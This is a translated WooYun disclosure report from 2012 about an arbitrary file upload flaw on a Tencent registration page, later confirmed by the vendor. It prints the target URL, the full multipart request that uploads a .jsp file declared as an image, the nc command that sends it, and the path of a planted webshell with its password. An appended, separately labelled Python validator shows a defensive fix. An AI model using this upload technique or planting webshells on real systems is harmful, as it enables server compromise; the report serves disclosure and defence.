Vulnerability summary
Defect ID: wooyun-2012-07463
Title: Arbitrary file upload vulnerability on a Tencent sub-site
Vendor: Tencent
Author: Jannock
Submitted: 2012-05-23 20:06
Fixed: 2012-07-07 20:07
Published: 2012-07-07 20:07
Vulnerability type: File upload leading to arbitrary code execution
Severity: High
Self-assessed Rank: 10
Status: Vendor has confirmed
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: None
Vulnerability details
Disclosure status:
2012-05-23: Details sent to the vendor and awaiting vendor handling
2012-05-23: Vendor has confirmed; details disclosed to the vendor only
2012-06-02: Details disclosed to core white hats and experts in related fields
2012-06-12: Details disclosed to ordinary white hats
2012-06-22: Details disclosed to intern white hats
2012-07-07: Details disclosed to the public
Brief description:
Arbitrary file upload vulnerability on a Tencent sub-site, which can lead to getting a shell.
Detailed description:
http://tap.3g.qq.com:8080/mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg
Registration page.
At the ID-card scan upload ("身份证扫描件"), arbitrary files can be uploaded directly. Remember to fill in the captcha incorrectly; only then does the response return the address of the uploaded file.
Below is the request submitted with nc:
POST /mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg HTTP/1.1
Host: tap.3g.qq.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Connection: keep-alive
Referer: http://tap.3g.qq.com:8080/mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg
Cookie: JSESSIONID=ft7AHd82i0g7rMg5Dt
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 2679
-----------------------------24464570528145
Content-Disposition: form-data; name="MVC_BUS"
CPRegister
-----------------------------24464570528145
Content-Disposition: form-data; name="MVC_ACTION"
NocpReg
-----------------------------24464570528145
Content-Disposition: form-data; name="agreeProtocol"
yes
-----------------------------24464570528145
Content-Disposition: form-data; name="codevalid"
-----------------------------24464570528145
Content-Disposition: form-data; name="isEdit"
false
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_username"
aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="newpwd"
111111
-----------------------------24464570528145
Content-Disposition: form-data; name="newpwd_again"
111111
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_name"
aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_person"
aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_mobilephone"
13800138001
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contacttel1"
333-3-55555555
-----------------------------24464570528145
Content-Disposition: form-data; name="province"
2
-----------------------------24464570528145
Content-Disposition: form-data; name="city"
2
-----------------------------24464570528145
Content-Disposition: form-data; name="area"
21
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_qq"
16104383133
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_email"
16104383133@qq.com
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_identitycode"
610722197909188715
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_cert_image"; filename="watermarkpreview.jsp"
Content-Type: image/jpeg
xxxxxx
-----------------------------24464570528145
Content-Disposition: form-data; name="cert_image"
http://tap.3g.qq.com:8080/certs/6513B59E371497A2FCAF47E6EC495666.jpg
-----------------------------24464570528145
Content-Disposition: form-data; name="code"
qmqj
-----------------------------24464570528145
Content-Disposition: form-data; name="codesid"
4TTWIX8F53WF3MOISJ7WDHXONNYYYGUU
-----------------------------24464570528145
Content-Disposition: form-data; name="randomSeed"
1115945018
-----------------------------24464570528145--
Note the cp_cert_image field.
nc tap.3g.qq.com 8080<1.txt
Looking at the response, you can find the path of the uploaded file:
http://tap.3g.qq.com:8080/certs/9AFF900FA65CF142E0506EBFC87A23D3.jsp
A webshell picked at random from the web; the password is: jspspy
Please delete it!
Proof of vulnerability:
Fix recommendation:
You should know what to do!
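The fix the report leaves unstated, as an added example that is not part of the original report or of Tencent's code: a server-side validator for an upload like the cp_cert_image field above. It accepts only bodies whose magic bytes match an allowed image type and stores them under a server-generated name and extension, so a client-supplied .jsp filename is never written to disk. The sample body is constructed here to mirror the request above.

```python
import secrets

# Accepted image types, identified by magic bytes, with the server-chosen
# extension used for storage. The client's filename is never used.
ALLOWED_TYPES = {
    "image/jpeg": (b"\xff\xd8\xff", "jpg"),
    "image/png": (b"\x89PNG\r\n\x1a\n", "png"),
}

def parse_multipart(body: bytes, boundary: str):
    """Split a multipart/form-data body into (headers, data) parts."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):  # closing delimiter reached
            break
        chunk = chunk.removeprefix(b"\r\n").removesuffix(b"\r\n")
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        parts.append((headers, data))
    return parts

def check_file_part(headers, data):
    """Return (accepted, reason, stored_name) for one uploaded file part."""
    if 'filename="' not in headers.get("content-disposition", ""):
        return False, "not a file part", None
    declared = headers.get("content-type", "")
    if declared not in ALLOWED_TYPES:
        return False, f"type {declared!r} not allowed", None
    magic, ext = ALLOWED_TYPES[declared]
    if not data.startswith(magic):
        # e.g. filename="x.jsp" declared as image/jpeg with a non-JPEG body
        return False, "body does not match declared image type", None
    # Random server-chosen name and extension; the client's "x.jsp" never reaches disk.
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"

def scan_upload(body: bytes, boundary: str):
    """Validate every file part of a request body; returns a list of results."""
    return [check_file_part(h, d) for h, d in parse_multipart(body, boundary)
            if 'filename="' in h.get("content-disposition", "")]

# Constructed sample modelled on the request above: a JSP declared as a JPEG, then a real JPEG.
BOUNDARY = "---------------------------24464570528145"
SAMPLE_BODY = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="cp_cert_image"; '
    'filename="watermarkpreview.jsp"\r\nContent-Type: image/jpeg\r\n\r\nxxxxxx\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="cp_cert_image"; '
    'filename="scan.jpg"\r\nContent-Type: image/jpeg\r\n\r\n'
).encode() + b"\xff\xd8\xff\xe0JFIF-bytes\r\n" + f"--{BOUNDARY}--\r\n".encode()
```

Calling scan_upload(SAMPLE_BODY, BOUNDARY) rejects the first part because its body is not a JPEG, and accepts the second under a random 32-hex-character name ending in .jpg.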
Copyright notice: when reposting, please credit the source Jannock@WooYun
Vulnerability responses
Vendor response:
Severity: High
Vulnerability Rank: 20
Confirmed at: 2012-05-23 20:47
Vendor reply:
Thank you very much for your report; we are already handling this issue urgently.
Latest status:
None